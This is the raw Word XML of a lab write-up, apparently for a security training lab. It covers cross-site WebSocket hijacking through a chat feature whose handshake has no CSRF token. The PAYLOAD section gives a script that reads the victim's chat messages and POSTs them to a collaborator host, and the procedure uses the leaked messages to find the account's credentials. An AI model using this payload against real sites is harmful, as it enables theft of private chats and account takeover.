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88E" w14:textId="12246F3D" w:rsidR="00320924" w:rsidRDefault="005F0A55" w:rsidP="008E1F5A">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61614FDF" w14:textId="552E6A8C" w:rsidR="008E1F5A" w:rsidRDefault="008E1F5A" w:rsidP="00381A61">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>The application has an aggressive but flawed XSS filter in the live chat functionalit</w:t>
      </w:r>
      <w:r w:rsidR="00110BED">
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. We will try to exploit the vulnerability to </w:t>
      </w:r>
      <w:r w:rsidR="00B53507" w:rsidRPr="00B53507">
        <w:t>exfiltrate the victim's chat history, then use this gain access to their account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BBCDEB" w14:textId="77777777" w:rsidR="00381A61" w:rsidRDefault="00381A61" w:rsidP="008E1F5A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A91A446" w14:textId="529D1FDF" w:rsidR="00381A61" w:rsidRDefault="00381A61" w:rsidP="00381A61">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>PROCEDURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594E711B" w14:textId="335AF742" w:rsidR="00381A61" w:rsidRDefault="00381A61" w:rsidP="00381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live chat option</w:t>
      </w:r>
      <w:r w:rsidR="00DB416F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and send a chat message then reload the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B74B3A1" w14:textId="77777777" w:rsidR="00DB416F" w:rsidRDefault="00381A61" w:rsidP="00DB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Interceptor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EFD3BA" w14:textId="4B91CCDC" w:rsidR="00DB416F" w:rsidRDefault="00DB416F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416F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>In Burp Proxy, in the HTTP history tab, find the WebSocket handshake request. Observe that the request has no CSRF tokens</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, so Copy the URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB416F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CFC224" w14:textId="21A416CE" w:rsidR="00A2548C" w:rsidRDefault="00A2548C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 paste the Payload 1 into the body of the exploit</w:t>
      </w:r>
      <w:r w:rsidR="00A45B70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576B17D5" w14:textId="4AA06F3A" w:rsidR="0047449B" w:rsidRDefault="0047449B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the View Exploit button and then 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Collaborator Client and click on Poll Now</w:t>
      </w:r>
      <w:r w:rsidR="005C7676">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, we notice that we get a lot of requests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444D86" w14:textId="7A669C15" w:rsidR="0064687A" w:rsidRDefault="00092A78" w:rsidP="00DF6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closely observe only the HTTP requests and leave rest of them</w:t>
      </w:r>
      <w:r w:rsidR="000F7D4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> to look for the username and password of the </w:t>
      </w:r>
      <w:r w:rsidR="00027270">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">target </w:t>
      </w:r>
      <w:r w:rsidR="000F7D4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>account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41271F" w14:textId="722DF67C" w:rsidR="00057B6C" w:rsidRPr="008F6763" w:rsidRDefault="0064687A" w:rsidP="00057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</w:t>
      </w:r>
      <w:r w:rsidR="00DF6C74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>log in with the credentials in order to solve the lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45110808" w14:textId="77777777" w:rsidR="008F6763" w:rsidRDefault="008F6763" w:rsidP="00057B6C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="257C848B" w14:textId="6855F7D1" w:rsidR="00057B6C" w:rsidRDefault="00057B6C" w:rsidP="00057B6C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>PAYLOAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C1F5F2" w14:textId="08169DD7" w:rsidR="00A45B70" w:rsidRPr="00A45B70" w:rsidRDefault="00A45B70" w:rsidP="00A45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>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360507FA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var 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 xml:space="preserve"> = new WebSocket('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wss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://your-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websocket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');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0FCB19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ws.onopen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 xml:space="preserve"> = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEF70A6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ws.send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>("READY");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC15FCD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3B8530F6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ws.onmessage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 xml:space="preserve"> = function(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB42002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45B70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>fetch(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A45B70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>'https://your-collaborator-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', {method: 'POST', mode: 'no-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cors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 xml:space="preserve">', body: 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event.data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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3CFA57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059EA9B1" w14:textId="0A5CC123" w:rsidR="00057B6C" w:rsidRPr="00057B6C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>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36312455" w14:textId="77777777" w:rsidR="00A45B70" w:rsidRDefault="00A45B70" w:rsidP="00057B6C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32994613" w14:textId="6CB6A6FD" w:rsidR="00057B6C" w:rsidRPr="00057B6C" w:rsidRDefault="00057B6C" w:rsidP="00057B6C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00057B6C" w:rsidRPr="00057B6C" w:rsidSect="005F0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581"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D312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B76"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FF0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42180">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="25082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96"/>
    <w:rsid w:val="00027270"/>
    <w:rsid w:val="00057B6C"/>
    <w:rsid w:val="00092A78"/>
    <w:rsid w:val="000F7D4E"/>
    <w:rsid w:val="00110BED"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="00381A61"/>
    <w:rsid w:val="0047449B"/>
    <w:rsid w:val="005017DD"/>
    <w:rsid w:val="00563225"/>
    <w:rsid w:val="005C7676"/>
    <w:rsid w:val="005F0A55"/>
    <w:rsid w:val="0064687A"/>
    <w:rsid w:val="008E1F5A"/>
    <w:rsid w:val="008F6763"/>
    <w:rsid w:val="00A03B96"/>
    <w:rsid w:val="00A2548C"/>
    <w:rsid w:val="00A45B70"/>
    <w:rsid w:val="00B44B99"/>
    <w:rsid w:val="00B53507"/>
    <w:rsid w:val="00DB416F"/>
    <w:rsid w:val="00DF6C74"/>
    <w:rsid w:val="00E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82AA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{55399DF4-BAF1-4B78-926B-2B334BF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61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F5A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E1F5A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381A61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81A61"/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1A61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38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2023-09-21T06:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-21T06:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>